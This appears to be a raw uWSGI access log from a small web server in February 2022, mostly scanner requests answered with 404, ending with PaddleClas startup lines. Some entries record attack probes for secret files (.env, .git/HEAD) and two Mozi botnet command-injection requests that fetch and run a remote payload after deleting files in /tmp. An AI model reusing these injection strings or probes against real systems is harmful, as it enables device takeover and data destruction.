192.241.214.26 () {34 vars in 394 bytes} [Thu Feb 17 01:50:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1531/1775] 8.142.23.67 () {38 vars in 677 bytes} [Thu Feb 17 02:06:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1532/1776] 121.89.200.181 () {38 vars in 680 bytes} [Thu Feb 17 02:10:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1533/1777] 121.89.200.181 () {30 vars in 357 bytes} [Thu Feb 17 02:10:21 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1534/1778] 121.89.200.181 () {30 vars in 355 bytes} [Thu Feb 17 02:10:23 2022] GET /robots.txt => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1535/1779] 39.103.146.195 () {38 vars in 680 bytes} [Thu Feb 17 02:19:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1536/1780] 39.103.146.195 () {30 vars in 355 bytes} [Thu Feb 17 02:19:49 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1537/1781] 39.103.146.195 () {30 vars in 357 bytes} [Thu Feb 17 02:19:49 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 111/1782] 39.103.146.195 () {24 vars in 261 bytes} [Thu Feb 17 02:21:58 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 53/1783] 39.103.146.195 () {34 vars in 638 bytes} [Thu Feb 17 02:21:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 26/1784] 39.103.146.195 () {26 vars in 315 bytes} [Thu Feb 17 02:22:12 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1538/1785] 39.103.237.48 () {38 vars in 679 bytes} [Thu Feb 17 02:24:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1539/1786] 107.189.13.6 () {32 vars in 370 bytes} [Thu Feb 17 02:55:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1540/1787] 109.237.103.9 () {36 vars in 523 bytes} [Thu Feb 17 03:05:21 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1541/1788] 106.15.95.120 () {34 vars in 459 bytes} [Thu Feb 17 03:14:45 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1542/1789] 167.248.133.117 () {28 vars in 312 bytes} [Thu Feb 17 03:55:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1543/1790] 167.248.133.117 () {34 vars in 444 bytes} [Thu Feb 17 03:55:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1544/1791] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 17 04:14:59 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1545/1792] 37.120.142.10 () {34 vars in 552 bytes} [Thu Feb 17 04:17:58 2022] HEAD / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1546/1793] 37.120.142.10 () {34 vars in 559 bytes} [Thu Feb 17 04:17:59 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1547/1794] 37.120.142.10 () {38 vars in 666 bytes} [Thu Feb 17 04:18:00 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1548/1795] 198.46.233.60 () {48 vars in 876 bytes} [Thu Feb 17 05:45:30 2022] POST /boaform/admin/formLogin => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1549/1796] 162.221.192.26 () {34 vars in 488 bytes} [Thu Feb 17 06:25:12 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1550/1797] 134.122.59.51 () {36 vars in 481 bytes} [Thu Feb 17 06:57:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1551/1798] 183.136.225.56 () {34 vars in 535 bytes} [Thu Feb 17 07:55:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1552/1799] 91.219.55.20 () {30 vars in 435 bytes} [Thu Feb 17 08:05:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1553/1800] 188.214.106.182 () {36 vars in 564 bytes} [Thu Feb 17 08:15:12 2022] GET /.git/HEAD => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1554/1801] 200.110.172.74 () {32 vars in 464 bytes} [Thu Feb 17 08:30:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1555/1802] 49.143.32.6 () {34 vars in 639 bytes} [Thu Feb 17 09:37:27 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1556/1803] 200.53.20.96 () {32 vars in 463 bytes} [Thu Feb 17 09:38:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1557/1804] 172.105.189.111 () {34 vars in 489 bytes} [Thu Feb 17 09:55:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1558/1805] 20.151.201.9 () {36 vars in 499 bytes} [Thu Feb 17 10:32:34 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1559/1806] 35.195.93.98 () {42 vars in 562 bytes} [Thu Feb 17 10:44:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1560/1807] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 17 10:47:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1561/1808] 81.39.100.157 () {34 vars in 393 bytes} [Thu Feb 17 10:54:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1562/1809] 216.218.206.69 () {28 vars in 308 bytes} [Thu Feb 17 11:22:50 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1563/1810] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 17 12:16:49 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1564/1811] 51.254.59.113 () {32 vars in 449 bytes} [Thu Feb 17 13:04:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1565/1812] 80.72.77.81 () {32 vars in 468 bytes} [Thu Feb 17 13:31:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1566/1813] 165.154.60.61 () {30 vars in 328 bytes} [Thu Feb 17 13:45:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1567/1814] 137.184.179.13 () {36 vars in 554 bytes} [Thu Feb 17 13:58:07 2022] GET /system_api.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1568/1815] 137.184.179.13 () {36 vars in 550 bytes} [Thu Feb 17 13:58:07 2022] GET /c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1569/1816] 137.184.179.13 () {36 vars in 578 bytes} [Thu Feb 17 13:58:08 2022] GET /streaming/clients_live.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1570/1817] 137.184.179.13 () {36 vars in 580 bytes} [Thu Feb 17 13:58:08 2022] GET /stalker_portal/c/version.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1571/1818] 137.184.179.13 () {36 vars in 509 bytes} [Thu Feb 17 13:58:08 2022] GET /stream/live.php => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1572/1819] 137.184.179.13 () {36 vars in 550 bytes} [Thu Feb 17 13:58:08 2022] GET /flu/403.html => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1573/1820] 137.184.179.13 () {36 vars in 526 bytes} [Thu Feb 17 13:58:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1574/1821] 101.133.140.114 () {32 vars in 504 bytes} [Thu Feb 17 14:07:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1575/1822] 103.203.58.4 () {30 vars in 346 bytes} [Thu Feb 17 14:14:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1576/1823] 136.144.41.117 () {40 vars in 568 bytes} [Thu Feb 17 14:23:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1577/1824] 101.133.224.44 () {36 vars in 550 bytes} [Thu Feb 17 14:37:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1578/1825] 142.147.99.155 () {36 vars in 524 bytes} [Thu Feb 17 14:37:38 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1579/1826] 142.147.99.155 () {40 vars in 631 bytes} [Thu Feb 17 14:37:39 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 54/1827] 106.14.126.174 () {34 vars in 604 bytes} [Thu Feb 17 14:39:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 55/1828] 106.14.126.174 () {34 vars in 650 bytes} [Thu Feb 17 14:39:32 2022] GET /explicit_not_exist_path => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1580/1829] 106.14.126.174 () {34 vars in 616 bytes} [Thu Feb 17 14:39:33 2022] GET /admin/ => generated 0 bytes in 1 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1581/1830] 106.14.126.174 () {34 vars in 653 bytes} [Thu Feb 17 14:39:33 2022] GET /admin/login/?next=/admin/ => generated 2214 bytes in 6 msecs (HTTP/1.1 200) 9 headers in 461 bytes (1 switches on core 0) +[pid: 19141|app: 0|req: 6/1831] 106.14.126.174 () {36 vars in 713 bytes} [Thu Feb 17 14:39:33 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 112/1832] 106.14.126.174 () {36 vars in 715 bytes} [Thu Feb 17 14:39:33 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 113/1833] 106.14.126.174 () {36 vars in 745 bytes} [Thu Feb 17 14:39:33 2022] GET /login/img/product_logo.png => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 114/1834] 106.14.126.174 () {36 vars in 725 bytes} [Thu Feb 17 14:39:33 2022] GET /images/ofbiz.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 14/1835] 106.14.126.174 () {36 vars in 743 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/css/base.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 15/1836] 106.14.126.174 () {36 vars in 783 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/js/admin/RelatedObjectLookups.js => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 16/1837] 106.14.126.174 () {36 vars in 753 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/css/dashboard.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 17/1838] 106.14.126.174 () {36 vars in 749 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/img/icon-no.gif => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1582/1839] 106.14.126.174 () {36 vars in 761 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/js/LICENSE-JQUERY.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 27/1840] 106.14.126.174 () {36 vars in 781 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/fonts/Roboto-Light-webfont.woff => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 23/1841] 106.14.126.174 () {36 vars in 745 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/css/fonts.css => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 24/1842] 106.14.126.174 () {36 vars in 749 bytes} [Thu Feb 17 14:39:33 2022] GET /static/admin/img/icon-no.svg => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 25/1843] 106.14.126.174 () {36 vars in 715 bytes} [Thu Feb 17 14:39:33 2022] GET /phpMyAdmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19144|app: 0|req: 26/1844] 106.14.126.174 () {36 vars in 715 bytes} [Thu Feb 17 14:39:33 2022] GET /phpmyadmin/ => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1583/1845] 106.14.126.174 () {36 vars in 701 bytes} [Thu Feb 17 14:39:33 2022] GET /wcm/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1584/1846] 142.147.99.155 () {36 vars in 524 bytes} [Thu Feb 17 14:54:43 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 115/1847] 142.147.99.155 () {40 vars in 631 bytes} [Thu Feb 17 14:54:45 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1585/1848] 109.237.103.118 () {36 vars in 525 bytes} [Thu Feb 17 15:00:01 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1586/1849] 1.13.189.96 () {34 vars in 367 bytes} [Thu Feb 17 15:10:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1587/1850] 185.180.143.7 () {34 vars in 487 bytes} [Thu Feb 17 15:13:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1588/1851] 162.142.125.210 () {30 vars in 402 bytes} [Thu Feb 17 15:35:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1589/1852] 162.142.125.210 () {22 vars in 236 bytes} [Thu Feb 17 15:35:20 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1590/1853] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 17 18:10:22 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1591/1854] 2.57.121.44 () {34 vars in 400 bytes} [Thu Feb 17 18:16:13 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1592/1855] 163.125.58.164 () {34 vars in 651 bytes} [Thu Feb 17 19:04:21 2022] GET /shell?cd+/tmp;rm+-rf+*;wget+http://163.125.58.164:52816/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1593/1856] 69.194.182.218 () {36 vars in 524 bytes} [Thu Feb 17 20:10:54 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1594/1857] 69.194.182.218 () {40 vars in 631 bytes} [Thu Feb 17 20:10:55 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1595/1858] 40.124.34.150 () {36 vars in 523 bytes} [Thu Feb 17 20:52:23 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1596/1859] 40.124.34.150 () {40 vars in 630 bytes} [Thu Feb 17 20:52:24 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1597/1860] 113.31.103.17 () {30 vars in 328 bytes} [Thu Feb 17 21:07:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1598/1861] 47.242.80.75 () {32 vars in 408 bytes} [Thu Feb 17 21:10:43 2022] GET /text4041645132243 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1599/1862] 47.242.80.75 () {28 vars in 306 bytes} [Thu Feb 17 21:10:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19142|app: 0|req: 8/1863] 47.242.80.75 () {32 vars in 394 bytes} [Thu Feb 17 21:10:43 2022] GET /evox/about => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19140|app: 0|req: 6/1864] 47.242.80.75 () {34 vars in 410 bytes} [Thu Feb 17 21:10:43 2022] POST /sdk => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1600/1865] 47.242.80.75 () {32 vars in 384 bytes} [Thu Feb 17 21:10:43 2022] GET /HNAP1 => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 116/1866] 47.242.80.75 () {36 vars in 462 bytes} [Thu Feb 17 21:10:54 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19146|app: 0|req: 56/1867] 47.242.80.75 () {34 vars in 413 bytes} [Thu Feb 17 21:10:54 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1601/1868] 2.57.121.44 () {34 vars in 400 bytes} [Thu Feb 17 21:27:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1602/1869] 209.17.96.114 () {30 vars in 410 bytes} [Thu Feb 17 21:40:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1603/1870] 164.90.197.46 () {32 vars in 439 bytes} [Thu Feb 17 21:47:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1604/1871] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 17 21:51:46 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1605/1872] 89.163.231.26 () {36 vars in 523 bytes} [Thu Feb 17 23:46:15 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1606/1873] 89.163.231.26 () {40 vars in 630 bytes} [Thu Feb 17 23:46:16 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1607/1874] 89.163.231.26 () {36 vars in 523 bytes} [Thu Feb 17 23:47:38 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1608/1875] 89.163.231.26 () {40 vars in 630 bytes} [Thu Feb 17 23:47:38 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1609/1876] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 18 00:03:50 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1610/1877] 47.101.189.57 () {34 vars in 459 bytes} [Fri Feb 18 00:10:56 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1611/1878] 183.136.225.56 () {34 vars in 456 bytes} [Fri Feb 18 00:47:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1612/1879] 20.151.201.9 () {32 vars in 447 bytes} [Fri Feb 18 01:17:22 2022] GET /cgi-bin/luci => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1613/1880] 192.241.212.44 () {34 vars in 394 bytes} [Fri Feb 18 02:00:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1614/1881] 183.71.240.82 () {36 vars in 699 bytes} [Fri Feb 18 02:01:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1615/1882] 136.144.41.117 () {40 vars in 568 bytes} [Fri Feb 18 02:26:31 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1616/1883] 64.62.197.182 () {28 vars in 307 bytes} [Fri Feb 18 03:51:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 167.248.133.46 client_port: 39613] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19147|app: 0|req: 117/1884] 167.248.133.46 () {24 vars in 266 bytes} [Fri Feb 18 04:24:20 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1617/1885] 167.248.133.46 () {30 vars in 401 bytes} [Fri Feb 18 04:24:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1618/1886] 167.248.133.46 () {22 vars in 235 bytes} [Fri Feb 18 04:24:21 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1619/1887] 83.97.20.34 () {30 vars in 329 bytes} [Fri Feb 18 04:28:37 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1620/1888] 82.76.165.109 () {36 vars in 523 bytes} [Fri Feb 18 05:28:26 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1621/1889] 82.76.165.109 () {40 vars in 630 bytes} [Fri Feb 18 05:28:27 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1622/1890] 83.97.20.34 () {26 vars in 287 bytes} [Fri Feb 18 06:06:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1623/1891] 68.66.164.26 () {36 vars in 522 bytes} [Fri Feb 18 06:14:59 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1624/1892] 68.66.164.26 () {40 vars in 629 bytes} [Fri Feb 18 06:15:00 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1625/1893] 151.11.200.2 () {32 vars in 469 bytes} [Fri Feb 18 07:40:59 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 1626/1894] 81.17.24.154 () {40 vars in 627 bytes} [Fri Feb 18 07:58:18 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +req +2022-02-18 08:42:06 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-18 08:42:06 INFO: DetPostProcess : +2022-02-18 08:42:06 INFO: DetPreProcess : +2022-02-18 08:42:06 INFO: transform_ops : +2022-02-18 08:42:06 